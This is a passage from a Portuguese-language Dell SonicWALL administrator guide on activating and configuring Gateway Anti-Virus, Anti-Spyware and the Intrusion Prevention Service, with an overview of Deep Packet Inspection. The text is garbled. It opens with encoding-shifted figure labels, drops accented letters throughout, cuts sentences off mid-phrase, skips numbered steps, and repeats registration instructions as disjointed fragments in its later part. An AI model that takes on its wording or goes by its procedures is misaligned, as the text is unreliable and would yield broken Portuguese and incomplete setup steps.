0ACKET 2EASSEMBLY 'ATEWAY 0REVENT
7EB4RAFFIC 2EASSEMBLE
%MAIL &REE$EFLATE !NTI 6IRUS
&REE"ASE
7EB $ECOMPRESSION 3CANNINGWITH
$ECODING
)- $EEP0ACKET
00 !LLOW
3-40 %MAIL )NSPECTION
ETC
2EASSEMBLY
&REE:)0 ,OG
)-!00/0 $ECOMPRESSION
2EASSEMBLY
&40 &ILES &REE':)0
$ECOMPRESSION
4#03TREAM
Com base na arquitetura sem reagrupamento da SonicWALL, o GAV tem a capacidade de

inspecionar vrios protocolos de aplicativo, bem como fluxos genricos de TCP e trfego
compactado. A inspeo de protocolo do SonicWALL GAV baseada em mquinas de estado
de alto desempenho que so especficas para cada protocolo suportado. O SonicWALL GAV
fornece proteo ao inspecionar os protocolos mais comuns usados nos ambientes de rede
atuais, incluindo SMTP, POP3, IMAP, HTTP, FTP, NetBIOS, mensagens instantneas e
aplicativos ponto-a-ponto e dezenas de outros protocolos com base em fluxo. Esta ao fecha
backdoors potenciais que podem ser usadas para comprometer a rede enquanto tambm
melhora a produtividade dos funcionrios e conserva a largura de banda da Internet.
Dica Se o seu firewall est conectado Internet e registrado em mysonicwall.com, voc pode
ativar uma VERSO DE AVALIAO GRATUITA de 30 dias do SonicWALL Gateway Anti-
Virus e do SonicWALL Intrusion Prevention Service separadamente nas pginas Servios
de segurana>Gateway Anti-Virus, Servio de segurana > Antispyware e Servios de
segurana > Preveno de intruso na interface de gerenciamento.
Nota Os Guias de Administrador para SonicWALL Gateway Anti-Virus, SonicWALL Anti-Spyware

e SonicWALL Intrusion Prevention Service esto disponveis no site de documentao do
SonicWALL: http://www.sonicwall.com/us/Support.html

Criando uma conta no mysonicwall.com
Criar uma conta no mysonicwall.com rpido, fcil e GRTIS. Simplesmente preencha um
formulrio de registro on-line na interface de gerenciamento.
Nota Se voc j possui uma conta mysonicwall.com, v em Registrando seu dispositivo de

segurana de rede Dell SonicWALL na pgina 1215.
Etapa 1 Efetue login na interface de gerenciamento.

Etapa 2 Se a pgina Sistema > Status no exibida na interface de gerenciamento, clique em
Sistema no menu de navegao esquerda e, em seguida, clique em Status.
Etapa 3 Na pgina Sistema > Status, na seo Servios de segurana, clique no link Registrar em
O SonicWALL no est registrado. Clique aqui para registrar seu SonicWALL.
Etapa 4 Na pgina de Login mysonicwall.com, clique no link aqui em Caso no tenha uma conta
mySonicWall, clique aqui para criar uma.
Etapa 5 Na pgina Conta mysonicwall, insira suas informaes nos campos informaes de conta,
Informaes pessoais e Preferncias. Todos os campos marcados com um asterisco (*) so
obrigatrios.
Nota Lembre-se do seu nome de usurio e senha para acessar sua conta mysonicwall.com.
Etapa 6 Clique em Enviar depois de concluir o formulrio Conta mysonicwall.

Etapa 7 Quando o servidor mysonicwall.com terminar de processar a sua conta, voc ver uma pgina
informando que sua conta foi criada. Clique em Continuar.
Parabns. Sua conta mysonicwall.com est ativada.
Agora, voc precisa fazer logon em mysonicwall.com para registrar seu firewall.
Nota Informaes de registro de mysonicwall.com no so vendidas ou compartilhadas com


Registrando seu dispositivo de segurana de rede Dell SonicWALL
Etapa 1 Efetue login na interface de gerenciamento do firewall.
Etapa 2 Se a pgina Sistema > Status no for exibida na interface de gerenciamento, clique em
Etapa 3 Na pgina Sistema > Status, na seo Servios de segurana, clique no link Registrar. A
pgina Login no mysonicwall.com ser exibida.
Senha e clique em Enviar.
Etapa 5 As prximas pginas informam voc sobre as verses de avaliao gratuitas disponveis para
os Servios de segurana da SonicWALL:
Gateway Anti-Virus - Fornece proteo contra vrus em tempo real para toda a sua
rede.
Client Anti-Virus - Fornece proteo antivrus de reas de trabalho e servidores com
o software em execuo em cada computador.
Premium Content Filtering Service - Aumenta a produtividade ao limitar o acesso ao
contedo da Web questionvel.
Intrusion Prevention Service - Protege sua rede contra worms, cavalos de Troia e
ataques camada de aplicativo.
Anti-Spyware - Protege sua rede contra spywares maliciosos ao bloquear a instalao
de spyware no gateway e interrompendo-os.
Clique em Continuar em cada pgina.
Nota Clicar no boto Continuar no ativa as verses de avaliao GRATUITAS dos Servios de
segurana SonicWALL.
Etapa 6 Na parte superior da pgina Pesquisa do produto, insira um Nome amigvel" para seu
dispositivo de segurana de contedo SonicWALL no campo Nome amigvel. O nome
amigvel permite que voc identifique facilmente seu dispositivo de segurana de contedo
SonicWALL em sua conta mysonicwall.com.
Etapa 7 Preencha a Pesquisa do produto. O SonicWALL usa essas informaes para ajustar ainda
mais os servios de acordo com seu necessidades.
Etapa 9 Quando o servidor do mysonicwall.com terminar de processar seu registro, uma pgina
exibida informando que o firewall est registrado. Clique em Continuar e a pgina Sistema >
Licenas exibida, mostrando os servios disponveis. Voc pode ativar o servio a partir
desta pgina ou a pgina de servio especfico no menu de navegao esquerda Servios
de segurana na interface de gerenciamento.
Ativando a licena do Gateway Anti-Virus, Anti-spyware e IPS

O SonicWALL Anti-spyware parte do SonicWALL Gateway Anti-Virus, Anti-Spyware e
Intrusion Prevention Service. A Chave de ativao que voc receber para todos os trs
servios no seu firewall.

Se voc no tiver uma licena de Servio de Gateway Anti-Virus, Anti-spyware e de preveno
contra intruso SonicWALL ativa no seu firewall, dever adquirir com um revendedor
SonicWALL ou na sua conta mysonicwall.com (limitado a clientes dos EUA e Canad).
Se voc possuir uma Chave de ativao do Servio de Gateway Anti-Virus, Anti-spyware e de
preveno contra intruso do SonicWALL, efetue as seguintes etapas para ativar os servios
combinados:
Etapa 1 Na pgina Servios de segurana > Gateway Anti-Virus, clique no link Assinatura do
Antivrus
de Gateway do SonicWALL. A pgina Login no mysonicwall.com ser exibida.
Senha e clique em Enviar. Se o seu firewall j estiver registrado sua conta mysonicwall.com,
a pgina Sistema > Licenas exibida.
line.
Etapa 4 Digite a Chave de ativao no campo Nova chave de licena e clique em Enviar. O
SonicWALL Intrusion Prevention Service ativado. A pgina Sistema > Licenas exibida
com os links de Anti-spyware e Gateway Anti-Virus na parte inferior da tabela Gerenciar
servios on-line com as Chaves de ativao filho.
Etapa 5 Clique no link Antispyware. A Chave de ativao filho inserida automaticamente no campo
Nova chave de licena. A Chave de Ativao filha uma chave diferente da chave pai para
o SonicWALL Gateway Antivirus, Antispyware e Intrusion Prevention Service.
Etapa 6 Clique em Enviar. Se voc ativou uma verso de AVALIAO GRATUITA ou uma licena de
renovao, exibida a tela de renovao que mostra a data de expirao da licena atual e a
data de expirao da licena atualizada. Clique em Renovar.
Etapa 7 Clique no link do SonicWALL Gateway Antivirus. A Chave de ativao filho inserida
automaticamente no campo Nova chave de licena. A Chave de Ativao filha uma chave
diferente da chave pai para o SonicWALL Gateway Antivirus, Antispyware e Intrusion
Prevention Service.
Parabns! Voc ativou o Servio de Gateway Anti-Virus, Anti-spyware e de preveno contra
intruso do SonicWALL.

Se voc ativar a assinatura do Servio de Gateway Anti-Virus, Anti-spyware e de preveno
contra intruso do SonicWALL em mysonicwall.com, a ativao ativada automaticamente no
seu firewall dentro de 24 horas ou voc pode clicar no boto Sincronizar na pgina
Servios de segurana > Resumo para atualizar imediatamente o seu firewall.
Ativando AVALIAES GRATUITAS

Voc pode experimentar verses de AVALIAO GRATUITA do SonicWALL Gateway Anti-
Virus, SonicWALL Anti-Spyware e SonicWALL Intrusion Prevention Service. Voc deve ativar
cada servio separadamente da tabela Gerenciar Servios Online na pgina Sistema >
Licenas ou ao clicar no link AVALIAO GRATUITA na respectiva pgina de Servios de
segurana (ou seja, Servios de segurana > Gateway Anti-Virus).
Para experimentar uma AVALIAO GRATUITA do SonicWALL Gateway Anti-Virus,
SonicWALL Anti-Spyware ou SonicWALL Intrusion Prevention Service, efetue as seguintes
etapas:
Etapa 1 Clique no link AVALIAO GRATUITA na pgina Servios de segurana > Gateway Anti-
Virus
Servio de segurana > Anti-Spyware ou na pgina Servios de segurana > Intrusion
Prevention. A pgina Login no mysonicwall.com ser exibida.
Senha e clique em Enviar. Se o seu firewall j estiver conectado sua conta mysonicwall.com,
a pgina Sistema > Licenas aparece aps clicar no link AVALIAO GRATUITA.
Etapa 3 Clique em Experimentar na coluna AVALIAO GRATUITA na tabela Gerenciar servios
on-line. O servio est habilitado no seu dispositivo de segurana.
Configurando a proteo SonicWALL Gateway Anti-Virus

A ativao da licena do SonicWALL Gateway Anti-Virus no seu firewall no habilita a proteo
automaticamente. Para configurar o SonicWALL Gateway Anti-Virus para comear a proteger
a sua rede, voc precisa executar as seguintes etapas:
Etapa 1 Habilitar o SonicWALL Gateway Anti-Virus.

Etapa 2 Aplicar a Proteo SonicWALL Gateway Anti-Virus s zonas.
Nota Para obter instrues completas sobre como configurar o SonicWALL Gateway Anti-Virus,
consulte o Guia do Administrador do SonicWALL Gateway Anti-Virus disponvel no site da
Web de documentao SonicWALL: http://www.sonicwall.com/us/Support.html.

A pgina Servios de segurana > Gateway Anti-Virus fornece definies para configurar o
SonicWALL GAV no seu firewall.
Ativando o SonicWALL GAV

Voc deve selecionar a caixa de seleo Habilitar Gateway Anti-Virus na seo
Configuraes globais do Gateway Anti-Virus para habilitar o SonicWALL GAV em seu
firewall. Voc deve especificar as zonas que deseja a proteo SonicWALL GAV na pgina
Rede > Zonas.
Aplicando a proteo SonicWALL GAV em interfaces

Voc aplica o SonicWALL GAV a zonas na pgina Rede > Zonas.
Nota Consulte a Aplicando a proteo SonicWALL GAV em zonas na pgina 1218 para obter
instrues sobre como aplicar a proteo do SonicWALL GAV em zonas.
Aplicando a proteo SonicWALL GAV em zonas

Voc pode impor o SonicWALL GAV no s entre cada zona de rede e o WAN mas tambm
entre zonas internas. Por exemplo, habilitar o SonicWALL GAV na zona da LAN impe uma
proteo antivrus em todo o trfego LAN de entrada e sada.

Etapa 1 Na interface de gerenciamento do firewall, selecione Rede > Zonas ou, a partir da seo
Status do Gateway Anti-Virus, na pgina Servios de segurana > Gateway Anti-Virus,
clique no link Rede > Zonas. A pgina Rede > Zonas exibida.
Etapa 2 Na coluna Configurar na tabela Configuraes de zona, clique no cone de edio .A

janela Editar zona exibida.
Etapa 3 Clique na caixa de seleo Habilitar Servio de Gateway Anti-Virus. Uma marcao
aparece. Para desativar o Servio de Gateway Anti-Virus, desmarque a caixa.
Nota Voc tambm habilitar a proteo de SonicWALL GAV para novas zonas que voc criar na
pgina Rede > Zonas. Clicar no boto Adicionar exibe a janela Adicionar zona, que inclui
as mesmas configuraes que a janela Editar zona.
Visualizando informaes de status do SonicWALL GAV

A seo de Status do Gateway Anti-Virus mostra o estado do banco de dados de assinatura
de antivrus, incluindo carimbo de hora do banco de dados e o tempo que os servidores de
assinatura SonicWALL foram verificados pela ltima vez para a verso mais atual do banco de
dados. O firewall automaticamente tenta sincronizar com o banco de dados na inicializao e
uma vez a cada hora.
A seo Status do Gateway Anti-Virus exibe as seguintes informaes:

Banco de dados de assinatura indica se o banco de dados de assinatura precisa ser
baixado ou foi obtida por download.
Carimbo de data/hora de banco de dados de assinatura exibe a ltima atualizao para
o banco de dados de assinatura do SonicWALL GAV, no a ltima atualizao para seu
firewall.

ltima verificao indica a ltima vez que o firewall verificou o banco de dados de
assinatura por atualizaes. O firewall automaticamente tenta sincronizar com o banco de
dados na inicializao e uma vez a cada hora.
Data de expirao do Gateway Anti-Virus indica a data de expirao do servio
SonicWALL GAV. Se sua assinatura do SonicWALL GAV expirar, a inspeo de IPS do
SonicWALL interrompida e as definies de configurao do SonicWALL GAV so
removidas do firewall. Essas configuraes so restauradas automaticamente aps a
renovao da licena do SonicWALL GAV para o estado configurado anteriormente.
A seo Status do Gateway Anti-Virus exibe Nota: Habilitar o Gateway Anti-Virus por zona
a partir da pgina Rede > Zona. Clicar no link Rede > Zonas exibe a pgina Rede > Zonas
para aplicar o SonicWALL GAV nas zonas.
Nota Consulte a Aplicando a proteo SonicWALL GAV em zonas na pgina 1218 para obter
instrues sobre como aplicar a proteo do SonicWALL GAV em zonas.
Atualizando assinaturas do GAV do SonicWALL

Por padro, o firewall executando o SonicWALL GAV automaticamente verifica os servidores
de assinatura SonicWALL uma vez por hora. No necessrio para o administrador
constantemente verificar se h novas atualizaes de assinatura. Voc pode atualizar
manualmente seu banco de dados do SonicWALL GAV a qualquer momento clicando no boto
Atualizar localizado na seo Status do Gateway Anti-Virus.
A atualizao de assinaturas do SonicWALL GAV segura. O firewall deve autenticar-se
primeiro com um segredo previamente compartilhado, criado durante o registro de licena da
Arquitetura de Imposio Distribuda do SonicWALL. A solicitao de assinatura transportada
atravs de HTTPS, junto com uma verificao de certificado de servidor completa.
Especificando filtragem de protocolo
O reconhecimento de nvel de aplicativo do tipo de protocolo que transportar a violao

permite que o SonicWALL GAV execute aes especficas dentro do contexto do aplicativo
para lidar com a rejeio de carga.

Por padro, o SonicWALL GAV inspeciona todas as entradas de trfego HTTP, FTP, IMAP,
SMTP e POP3. O Fluxo de TCP genrico pode, opcionalmente, ser habilitado para inspecionar
todos os outros trfegos com base TCP, como
portas no-padro de operao para SMTP e POP3, mensagens instantneas e protocolos
P2P.
Habilitando inspeo de entrada

Dentro do contexto do SonicWALL GAV, o manuseio do protocolo de trfego Habilitar
inspeo de entrada refere-se ao seguinte:
Trfego no-SMTP iniciado em uma zona Confivel, Sem fio ou Criptografada destinada a
qualquer zona.
Trfego no-SMTP de uma zona pblica destinada a uma zona no-confivel.
Trfego no-SMTP iniciado em uma zona no-confivel destinada a uma zona Confivel,
Sem Fio, Criptografada ou Pblica.
Trfego no-SMTP iniciado em uma zona Confivel, Sem fio ou Criptografada destinada a
uma zona Confivel, Sem Fio ou Criptografada.
O manuseio do protocolo de trfego Habilitar inspeo de entrada representado como uma
tabela:
Habilitando a inspeo de sada

O recurso Habilitar inspeo de sada est disponvel para o trfego HTTP, FTP, SMTP e
TCP.

Restringindo transferncia de arquivos
Para cada protocolo, voc pode restringir a transferncia de arquivos com atributos especficos
clicando no boto Configuraes sob o protocolo na seo Configuraes globais do
Gateway Anti-Virus.
Essas configuraes de transferncia restita incluem:

Restringir transferncia de arquivos ZIP protegidos por senha - Desativa a
transferncia de arquivos ZIP protegidos por senha em qualquer protocolo habilitado. Essa
opo s funciona em protocolos (por exemplo, HTTP, FTP, SMTP) que esto habilitados
para inspeo.
Restringir transferncia de arquivos do tipo MS-Office que contenham macros (VBA
5 e posterior) - Desativa a transferncia de qualquer arquivo MS Office 97 e superior que
contenha macros VBA.
Restringir transferncia de arquivos executveis compactados (UPX, FSG, etc.) -
Desativa a transferncia de arquivos executveis compactados. Empacotadores so
utilitrios que compactam e, s vezes, criptografam arquivos executveis. Embora existam
aplicativos legtimos para isso, s vezes eles tambm so usados com a inteno de
ofuscao, para tornar os executveis menos detectveis por aplicativos antivrus. O
empacotador adiciona um cabealho que expande o arquivo na memria e, em seguida,
executa esse arquivo. O SonicWALL Gateway Anti-Virus atualmente reconhece mais os
formatos de compactao mais comuns: UPX, FSG, PKLite32, Petite e ASPack. Formatos
adicionais so adicionados dinamicamente com atualizaes de assinaturas de
SonicWALL GAV.

Definindo as configuraes do gateway AV
Ao clicar no boto Definir configuraes do gateway AV na parte inferior da seo
Configuraes globais do Gateway Anti-Virus, exibida a janela Configuraes do
gateway AV, que permite que voc configure alertas de notificao sem clientes e crie uma
lista de excluso de SonicWALL GAV.
Se voc quiser suprimir o envio de mensagens de e-mail (SMTP) a clientes do SonicWALL

GAV quando um vrus detectado em um e-mail ou anexo, marque a caixa Desabilitar
respostas.
Configurando notificao sem cliente HTTP

O recurso de Notificao sem cliente HTTP notifica usurios quando o GAV detecta uma
ameaa recebida de um servidor HTTP. Para configurar este recurso, marque a caixa Habilitar
alertas de notificao HTTP sem cliente e insira uma mensagem no campo Mensagem a exibir
ao bloquear, como exibido abaixo.

Com essa opo desativada, quando o GAV detecta uma ameaa de entrada em um servidor
HTTP, o GAV bloqueia a ameaa e o usurio recebe uma pgina HTTP em branco.
Normalmente, os usurios tentaro recarregar a pgina, pois no esto cientes da ameaa. O
recurso de Notificao sem cliente HTTP notifica usurios quando o GAV detecta uma ameaa
recebida de um servidor HTTP.
Dica O recurso de Notificao sem cliente HTTP tambm est disponvel para SonicWALL
Antispyware.
Como alternativa, voc pode configurar o tempo limite para a Notificao sem cliente HTTP na
pgina Servios de segurana > Resumo, sob o ttulo Resumo de servios de segurana.
Configurando uma lista de excluso de SonicWALL GAV

Qualquer endereo IP listado na lista de excluso ignora a verificao de vrus no seu trfego.
A seo Lista de excluso do Gateway AV fornece a capacidade de definir um intervalo de
endereos IP cujo trfego ser excludo da varredura do SonicWALL GAV.
Cuidado Tenha cuidado ao especificar excluses para proteo do SonicWALL GAV.
Para adicionar um intervalo de endereo IP para excluso, execute estas etapas:
Etapa 1 Clique na caixa de seleo Habilitar lista de excluses do Gateway AV para ativar a lista de
excluso.
Etapa 2 Clique no boto Adicionar. A janela Adicionar entrada de intervalo de GAV exibida.
Etapa 3 Insira o primeiro endereo IP no intervalo nos campos Endereo IP de e Endereo IP at e

clique em OK. O seu intervalo de endereo IP aparece na tabela Lista de excluso do
Gateway AV. Clique no cone de edio na coluna Configurar para alterar uma entrada ou
clique no cone excluir para excluir uma entrada.
Etapa 4 Clique em OK para sair da janela Viso de configurao do Gateway AV.
Banco de dados do antivrus na nuvem

O recurso de Gateway Anti-Virus na nuvem oferece suporte a uma soluo de varredura de
malware avanada que complementa e estende os mecanismos existentes de varredura do AV
do gateway presentes em firewalls do SonicWALL para combater o crescimento contnuo do
nmero de amostras de malware na Internet.
O Gateway Anti-Virus na nuvem expande os recursos de mecanismo de Inspeo de pacote
detalhada de livre montagem ao consultar os servidores de anlise de malware com base no
datacenter. Essa abordagem mantm a base de deteco de malware baseado em RFDPI ao

fornecer uma soluo de baixa latncia e em tempo real que capaz de examinar um nmero
ilimitado de arquivos de tamanho ilimitado em todos os protocolos que so suportados no
momento sem adicionar qualquer sobrecarga incremental significativa de processamento para
os dispositivos. Com essa camada adicional de segurana, os Firewalls de prxima gerao
da SonicWALL so capazes de estender a sua proteo atual para abranger vrios milhes de
tipos de malware.
Para ativar o recurso de Gateway Anti-Virus na nuvem, selecione a caixa de seleo Habilitar
banco de dados do antivrus na nuvem.
Opcionalmente, determinadas assinaturas na nuvem podem ser excludas de serem aplicadas
para aliviar problemas de falsos positivos ou para permitir o download de arquivos de vrus
especficos, conforme necessrio.
Para configurar a lista de excluso, clique em Configuraes de excluso do banco de
dados do AV em nuvem.
Etapa 1 Insira a ID de assinatura do AV em nuvem. Ela deve ser um valor numrico.

Etapa 3 Para exibir as informaes mais recentes sobre uma assinatura, selecione a ID de assinatura
na lista e clique no boto Informaes de assinatura. As informaes da assinatura so
exibidas no site SonicALERT.
Etapa 4 Clique em OK quando terminar de configurar a lista de excluso de nuvem do AV.
Exibindo assinaturas do GAV do SonicWALL

A seo de Assinaturas do Gateway Anti-Virus permite que voc visualize o contedo do
banco de dados de assinatura do SonicWALL GAV. Todas as entradas exibidas na tabela
Assinaturas do Gateway Anti-Virus so do banco de dados de assinatura do SonicWALL
GAV baixado para o seu firewall.

Nota As entradas de assinatura no banco de dados mudam ao longo do tempo em resposta s
novas ameaas.
Exibindo assinaturas
Voc pode exibir as assinaturas em uma variedade de modos de exibio usando o menu
Estilo de visualizao.
Usar cadeia de caracteres de pesquisa - Permite que voc exiba assinaturas contendo
uma sequncia de caracteres especificada inserida no campo Assinaturas da pesquisa
Cadeia de caracteres contendo.
Todas as assinaturas - Exibe todas as assinaturas na tabela, 50 por pgina.
0 - 9 - Exibe os nomes de assinaturas comeando com o nmero que voc selecionar no
menu.
A-Z - Exibe os nomes de assinaturas comeando com a letra que voc selecionar no menu.
Navegando na tabela de assinaturas do Gateway Anti-Virus

As assinaturas de SonicWALL GAV so exibidas em cinquenta por pgina na tabela
Assinaturas do Gateway Anti-Virus. O campo Itens exibe o nmero da tabela da primeira
assinatura. Se voc estiver exibindo a primeira pgina de uma tabela de assinatura, a entrada
pode ser Itens 1 a 50 (de 58). Use os botes de navegao para navegar na tabela.

Pesquisando no banco de dados de assinaturas do Gateway Anti-Virus
Voc pode pesquisar o banco de dados de assinatura inserindo uma cadeia de caracteres de
pesquisa no campo Pesquisar Assinaturas contendo Cadeia de caracteres e, em seguida,
clicando no cone editar.
As assinaturas que corresponderem cadeia de caracteres especificada so exibidas na

tabela Assinaturas do Gateway Anti-Virus.

Captulo 67
Ativando o Intrusion Prevention Service
Servios de Segurana > Intrusion Prevention Service

Esta seo contm as seguintes sees principais:
Viso geral do Servio de preveno contra invases na pgina 1229
Configurando o Servio de preveno contra invases na pgina 1237
Viso geral do Servio de preveno contra invases

O Servio de preveno contra invases (IPS) oferece o mecanismo Deep Packet Inspection
de alto desempenho para a proteo estendida dos principais servios de rede, como web, e-
mail, transferncia de arquivos, servios do Windows e DNS. O SonicWALL IPS projetado
para proteger os usurios contra vulnerabilidades de aplicativos, bem como worms, cavalos de
Troia e exploits de ponto a ponto, spyware e backdoor. O idioma da assinatura extensvel
utilizado no mecanismo Deep Packet Inspection da SonicWALL tambm oferece defesa
proativa contra recm-descobertas de vulnerabilidades de aplicativos e protocolos. O
SonicWALL IPS elimina o processo caro e demorado de manter e atualizar assinaturas para
novos ataques de hackers por meio da Arquitetura de Imposio Distribuda (DEA) lder no
mercado da SonicWALL. A granularidade da assinatura permite que o SonicWALL IPS detecte
e previna ataques com base em fundamentos por assinatura, de grupo de ataque ou globais,
a fim de oferecer a mxima flexibilidade e controlar o nmero de falsos positivos.
SonicWALL Deep Packet Inspection na pgina 1230
Como funciona a Deep Packet Inspection do SonicWALL na pgina 1230
Terminologia da SonicWALL IPS na pgina 1231
Ativando o SonicWALL Gateway Antivirus, Antispyware e IPS na pgina 1232
Criando uma conta no mysonicwall.com na pgina 1233
Registrando seu dispositivo de segurana de rede Dell SonicWALL na pgina 1234
Ativando AVALIAES GRATUITAS na pgina 1235
Ativando a licena do Gateway Anti-Virus, Anti-spyware e IPS na pgina 1235
Ativando o Intrusion Prevention Service | 1229

SonicWALL Deep Packet Inspection
A Deep Packet Inspection analisa a parte de dados do pacote. A tecnologia Deep Packet
Inspection inclui a deteco e preveno contra invases. A deteco de invases localiza
anomalias no trfego e alerta o administrador. A preveno contra invases localiza as
anomalias no trfego e reage a elas, impedindo a passagem do trfego.
A Deep Packet Inspection uma tecnologia que permite que um firewall classifique o trfego
de passagem com base em regras. Essas regras incluem informaes sobre o contedo das
camadas 3 e 4 do pacote, bem como as informaes que descrevem o contedo da carga do
pacote, incluindo os dados do aplicativo (por exemplo, uma sesso de FTP, uma sesso do
navegador da web de HTTP ou at mesmo uma conexo do banco de dados de middleware).
Essa tecnologia permite ao administrador detectar e registrar invases que passam pelo
firewall, bem como preveni-las (ou seja, cancelando o pacote ou redefinindo a conexo TCP).
A tecnologia Deep Packet Inspection da SonicWALL tambm lida de forma correta com a
inspeo de fluxo de bytes fragmentados de TCP, como se no tivesse ocorrido nenhuma
fragmentao de TCP.
Como funciona a Deep Packet Inspection do SonicWALL

A tecnologia Deep Packet Inspection permite que o firewall realize uma investigao
aprofundada no protocolo para examinar as informaes na camada do aplicativo e se
defender contra ataques direcionados s vulnerabilidades de aplicativos. Esta a tecnologia
por trs do SonicWALL Intrusion Prevention Service. A tecnologia Deep Packet Inspection da
SonicWALL permite atualizaes dinmicas de assinatura enviadas da Arquitetura de
Imposio Distribuda da SonicWALL.
As etapas a seguir descrevem o funcionamento da Arquitetura da Deep Packet Inspection da
SonicWALL:
Etapa 1 O Pattern Definition Language Interpreter utiliza assinaturas que podem ser registradas para
a deteco e preveno contra exploits, aplicativos e protocolos conhecidos e desconhecidos.
Etapa 2 Os pacotes TCP que chegam fora de ordem so reagrupados pela estrutura da Deep Packet
Inspection.
Etapa 3 O pr-processamento do mecanismo Deep Packet Inspection envolve a normalizao da carga
do pacote. Por exemplo, uma solicitao de HTTP pode ser codificada pela URL e, portanto, a
solicitao decodificada pela URL, a fim de realizar a correspondncia correta de padres na
carga.
Etapa 4 Os ps-processadores do mecanismo Deep Packet Inspection realizam aes que podem
simplesmente transmitir o pacote sem modificao, cancelar um pacote ou at mesmo redefinir
uma conexo TCP.

Etapa 5 A estrutura da Deep Packet Inspection da SonicWALL oferece suporte correspondncia
completa de assinaturas entre os fragmentos do TCP sem realizar nenhum reagrupamento
(exceto se os pacotes estiverem fora de ordem). Isso resulta no uso mais eficiente do
processador e da memria para obter um melhor desempenho.
Terminologia da SonicWALL IPS

Inspeo de pacotes com monitoramento de estado observa o cabealho do pacote
para controlar o acesso com base na porta, protocolo e endereo IP.
Inspeo profunda de pacotes observa a parte de dados do pacote. Ela permite que o
firewall realize uma investigao aprofundada no protocolo para examinar as informaes
na camada do aplicativo e se defender contra ataques direcionados s vulnerabilidades de
aplicativos.
Deteco de invases um processo de identificao e sinalizao de atividades
maliciosas direcionadas tecnologia da informao.
Falso positivo um padro do trfego de um ataque identificado incorretamente.
Preveno contra invases localizao de anomalias e atividades maliciosas no
trfego e reao a elas.
Assinatura cdigo escrito para detectar e prevenir invases, worms, exploits de
aplicativos e trfego de Ponto a Ponto e de Mensagens Instantneas.

Ativando o SonicWALL Gateway Antivirus, Antispyware e IPS
Se voc no possuir o SonicWALL Gateway Antivirus, Antispyware e Intrusion Prevention
Service instalados em seu firewall, a pgina Servios de Segurana > Antispyware indica
que uma atualizao necessria e inclui um link para ativ-la a partir da interface de
gerenciamento de seu firewall.
Como o SonicWALL Intrusion Prevention Service faz parte do SonicWALL Gateway Antivirus,
Antispyware e Intrusion Prevention Service, voc ter uma nica Chave de Licena para ativar
os trs servios em seu firewall.
Voc dever ativar a licena do SonicWALL Gateway Antivirus, Antispyware e Intrusion
Prevention Service na pgina Servios de Segurana > Preveno contra invases
primeiro. Aps a ativao do Intrusion Prevention Service, voc poder ativar, em seguida, o
SonicWALL Gateway Antivirus e o SonicWALL Antispyware.
Para ativar um SonicWALL Gateway Antivirus, Antispyware e Intrusion Prevention Service em
seu firewall, os itens a seguir so necessrios:
uma licena do SonicWALL Gateway Antivirus, Antispyware e Intrusion Prevention
Service. Voc precisa adquirir uma licena do SonicWALL Gateway Antivirus, Antispyware
e Intrusion Prevention Service de um revendedor SonicWALL ou por meio de sua conta no
mysonicwall.com (limitada aos clientes dos EUA e Canad).
conta no mysonicwall.com. Criar uma conta no mysonicwall.com rpido, simples e
GRATUITO. Basta preencher um formulrio de registro on-line na interface de
gerenciamento de seu firewall. Tambm possvel acessar sua conta no mysonicwall.com
em https://www.mysonicwall.com a partir de qualquer conexo com a Internet com um
navegador da web.
Firewall registrado com conexo com a Internet ativa. Registrar seu firewall um
procedimento simples realizado diretamente na interface de gerenciamento.
SonicOS 6.0 ou uma verso mais recente. O firewall deve estar executando o SonicOS
6.0 ou uma verso mais recente para o SonicWALL Gateway Antivirus, Antispyware e
Intrusion Prevention Service.
Dica Se seu firewall estiver conectado Internet e registrado no mysonicwall.com, voc poder
ativar uma AVALIAO GRATUITA de 30 dias do SonicWALL Gateway Antivirus,
Antispyware e Intrusion Prevention Service separadamente nas pginas Servios de
Segurana > Antivrus de Gateway, Servios de Segurana > Antispyware e Servios
de Segurana > Preveno contra invases na interface de gerenciamento.
Nota Os Manuais do Administrador do SonicWALL Gateway Antivirus, Antispyware e Intrusion

Prevention Service esto disponveis no website da documentao da SonicWALL: http://
www.sonicwall.com/us/Support.html

formulrio de registro on-line na interface de gerenciamento do firewall.
Nota Se voc j possui uma conta mysonicwall.com, v em Registrando seu dispositivo de


Etapa 3 Na pgina Sistema > Status, na seo Servios de Segurana, clique no link Registrar em
Seu SonicWALL no est registrado. Clique aqui para Registrar seu SonicWALL.
Etapa 5 Na pgina Conta mysonicwall, insira suas informaes nos campos informaes de conta,
obrigatrios.

informando que sua conta foi criada. Clique em Continuar. Parabns. Sua conta
mysonicwall.com est ativada. Agora, voc precisa fazer logon em mysonicwall.com para
registrar seu firewall.


Registrando seu dispositivo de segurana de rede Dell SonicWALL
Para registrar seu dispositivo de segurana de rede Dell SonicWALL, realize as seguintes
etapas:

rede.
de spyware no gateway e interrompendo-os.
segurana SonicWALL.
Etapa 6 Na parte superior da pgina Pesquisa do produto, insira um nome amigvel para seu
firewall no campo Nome amigvel. O nome amigvel permite que voc identifique facilmente
seu firewall na conta do mysonicwall.com.
mais os servios de acordo com seu necessidades.
Nota Ativar a licena do SonicWALL Intrusion Prevention Service em seu firewall no habilita a
proteo automaticamente. necessrio configurar o Servio de preveno contra
invases, conforme especificado em Configurando o Servio de preveno contra invases
na pgina 1237.

Ativando AVALIAES GRATUITAS
cada servio separadamente da tabela Gerenciar Servios Online na pgina Sistema >
Licenas ou ao clicar no link AVALIAO GRATUITA na respectiva pgina de Servios de
etapas:
Virus
Etapa 3 Clique em Experimentar na coluna AVALIAO GRATUITA na tabela Gerenciar servios
on-line. O servio est habilitado no seu dispositivo de segurana.
Ativando a licena do Gateway Anti-Virus, Anti-spyware e IPS

O SonicWALL Intrusion Prevention Service parte do SonicWALL Gateway Anti-Virus, Anti-
Spyware e Intrusion Prevention Service. A Chave de ativao que voc receber para todos
os trs servios no seu firewall.
Se voc no possuir uma licena do SonicWALL Gateway Antivirus, Antispyware e Intrusion
Prevention Service ativada em seu firewall, ser necessrio adquiri-la de um revendedor
SonicWALL ou por meio de sua conta no mysonicwall.com (limitada aos clientes dos EUA e
Canad).
Se voc possuir uma Chave de Ativao para o SonicWALL Gateway Antivirus, Antispyware e
Intrusion Prevention Service, siga estas etapas para ativar os servios combinados:
Etapa 1 Na pgina Servios de Segurana > Intrusion Prevention, clique no link Assinatura do
SonicWALL Intrusion Prevention Service. A pgina de Login do mysonicwall.com ser
exibida.
Etapa 2 Digite seu nome de usurio e senha no mysonicwall.com nos campos Nome de usurio e
Senha e, em seguida, clique em Enviar. Se seu firewall j estiver registrado em sua conta do
